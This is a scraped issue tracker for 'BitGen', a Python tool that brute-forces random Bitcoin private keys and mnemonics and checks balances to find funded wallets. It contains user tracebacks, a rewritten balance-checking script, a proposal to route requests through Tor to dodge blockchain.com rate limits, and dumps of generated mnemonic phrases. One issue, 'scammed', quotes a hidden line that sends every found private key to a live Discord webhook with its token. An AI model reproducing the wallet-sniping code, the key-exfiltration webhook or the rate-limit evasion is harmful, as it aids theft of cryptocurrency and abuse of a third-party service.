You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-169' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-190' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-211' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-232' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete



















The result is not recorded

Hi friend, why doesn't it save the processed files to results / dry.txt? This file is not generated at startup

bad code line

scammed
webhook = DiscordWebhook(url='https://discord.com/api/webhooks/914476019086426145/OdSndxmXSr7CH3v4uPAgml_vYWDL5EXeCkb_5xpzp2KZP7CPtgV7ifFm9XyNJBpUCgvF', rate_limit_retry=True, content=f'@everyone Address: {addr} | Balance: {balance} | Private key: {prv}')

private key

could you explain how to use private key? I know how to login mnemonic code with, but what private key about?

Does not generate unique addresses

Good afternoon, colleagues.
I don't understand what I'm doing wrong, please help.
When the program starts, 100 unique addresses are checked, after which the program does not generate new 100 addresses, but checks the old ones in a cycle. Tell me what could be the reason?

txt

does not write results to a text file

any instructions pls for newbies py students

Add Tor proxy redirection in order to get unlimited calls to blockchain.com

Hi Anarab. I found your old btc mnemonic phrase bruteforce from python forum. I also know a russian guy who is selling your program for 500$. He also give me like a demo version with restrictions :). I searched his code on google and got to a python forum with your post. I also know that the guy who is selling it, added torrequest, and he is making calls through tor locally on windows. All his customers receive a .bat file that will install everything locally and start. IF the IP is banned, the execution window will wait and tray to find another tor ip (5 seconds). I am working at that solution right know but I still dont know exactly how to make a call to blockchain.com from tor IP because when I redirect trafic through tor, I receive 429 Code - too many request. So Maybe you should take in to consideration adding tor requests as well.
Add me in Telegram @nota_bene7
I have videos from his customers on how his program is installing, what component it install and how he is looking for proxy.

I also post a thread on stackoverflow and waiting for the results with help :))

https://stackoverflow.com/questions/69319204/add-tor-proxy-to-api-calls

Error

When I try to sync the blockchain key settings, I get an error saying: error try again later.
I am new to this and really dont know how everything works, so if someone has a tutorial or can say what im doing wrong, because aslo when i just put in my address, i get multiple: An error has occurred in the script on this page.

BitGen

It will be very good if the developers add a function so that it is possible to parse private keys to existing btc addresses or so that private keys are generated to existing btc addresses with their mandatory verification

good joke ;)

#from seed.py

def random():
    **# from bitcoin project**
    return str(os.urandom(32).hex()) \
           + str(randrange(2 ** 256)) \
           **+ str(int(time.time() * 1000000))**

good luck

Привет Чубайсу)

Where is mnemonic phrase ?

Anarb hello bro! Tell me how to make the program output a mnemonic phrase and not a private key? you need just the phrase to restore... can you help me with this problem.Tell me plz => [email protected]

Hello

Hello, I tried your new script, it works in the terminal. But when I ran the netstat program, I didn’t see any connection associated with the program.

i know

How can i run a local Api ?
:-)

BitGen doesn't save output file

BitGen doesn't save output file:

image
image

This program was made by Anarb and it generates Bitcoin by searching multiple possible
wallet combinations until it's finds one with over 0 BTC and saves it into

a file called "wet.txt" in the results folder.
It's recommended to leave this running for a long time to get the best resaults, It's doesn't use up
that much resources so you can leave it in the background in the chance of you hitting a jackpot.
It's like mining but with less resources

Modyfied by:
@Anonymousl33t TikTok
@anonymousl337 Telegram

threads: 1500
save dry wallets: y

Address: 1Mu53TU3TC3bUjMYT5u11NnrUFuCCKbHZE | Balance: None | Mnemonic phrase: circle forum verb reject more fame clean learn evil push million release
Address: 1JWt97w3uDngVYR4cjSLLGfi4j93ez8MT9 | Balance: None | Mnemonic phrase: antenna frog flush warfare oxygen worth disorder race intact nest release sheriff
Address: 158y4x69HoEPmVxaJMQ5ErcCHTKtMzmqiC | Balance: None | Mnemonic phrase: hurdle seat thrive helmet vapor face congress quarter master can alien security
Address: 12PJP5VVZSTPY2ZPrJ6LNzsDRxaCT7ZEGN | Balance: None | Mnemonic phrase: shoot news adjust disagree reopen body found alcohol man hungry bread already
Address: 1M8XszrDVXFqxaPVMFhziNSE9qpRcydvCE | Balance: None | Mnemonic phrase: swing narrow machine slim scatter tenant wreck joke nurse sunny amazing leisure
Address: 15rVeKei88jyxT3xZkBv1386RA65cPd6hg | Balance: None | Mnemonic phrase: exist buddy obtain hedgehog diary noodle bar jewel absurd ridge stomach cancel
Address: 1A74Uc8nDfzBiaQFW6fBE8SphB2JW3jnGm | Balance: None | Mnemonic phrase: raccoon accuse runway hurt street crystal obey observe cram pluck soldier age
Address: 19nrUXtcijj35SgTWGvWnrWTrBrceQYaLG | Balance: None | Mnemonic phrase: trap ride symptom rifle approve usage fashion swap basket shell segment fatal
Address: 1Gdyf3jd6GppE5nSXs1fsFnkzY8j7x2wtU | Balance: None | Mnemonic phrase: atom rubber select basic woman tower trap warrior engage normal entry juice
Address: 1B64hdeVDkzkFAGDcbVjYaHhoUcuYLxYKL | Balance: None | Mnemonic phrase: tower candy fee bracket receive mask glue raven scheme jewel rifle elite
Address: 1Ks4dTkh1a6n3giuzvvMNYNzCnpU8K4SSJ | Balance: None | Mnemonic phrase: shine purity spare fence need quality avoid shift effort human artist art
Address: 144Lfe4DvnRy3t2G5C2DaAQzvyCRXYFVH5 | Balance: None | Mnemonic phrase: grass picture mixture rail day enhance switch extra wedding build circle fever
And other...

You are rate-limited please switch to a vpn/proxy or you dont have connection

I run the script via main.py (all modules are installed), but the console writes this to me

You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
You are rate-limited please switch to a vpn/proxy or you dont have connection
PS C:\Users\agubl\OneDrive\Рабочий стол\BitGen-master>

Proxy

Bro, your program is awesome. How are you doing with the proxy? How soon will they appear?

Code problem

from time import sleep
import requests
import json
from btcaddr import Wallet
from time import sleep
from fake_user_agent import user_agent

def generate_addresses(count):
addresses = {}
for i in range(count):
wallet = Wallet()
pub = wallet.address.dict["mainnet"].dict["pubaddr1"]
prv = wallet.key.dict["mainnet"].dict["wif"]
addresses[pub] = prv
return addresses

def check_balance_btc():
try:
data=generate_addresses(20)
addresses = "|".join(data.keys())
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/116.0"
}
url = f"https://blockchain.info/multiaddr?active={addresses}"
response = requests.get(url, headers=headers).json()
sleep(0.5)
extract = []
for address in response["addresses"]:
# add all data into a list
extract.append({
"address": address["address"],
"balance": address["final_balance"],
"private": data[address["address"]]
})
return extract
except:
pass
generate_addresses(10)


New code for check.py

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.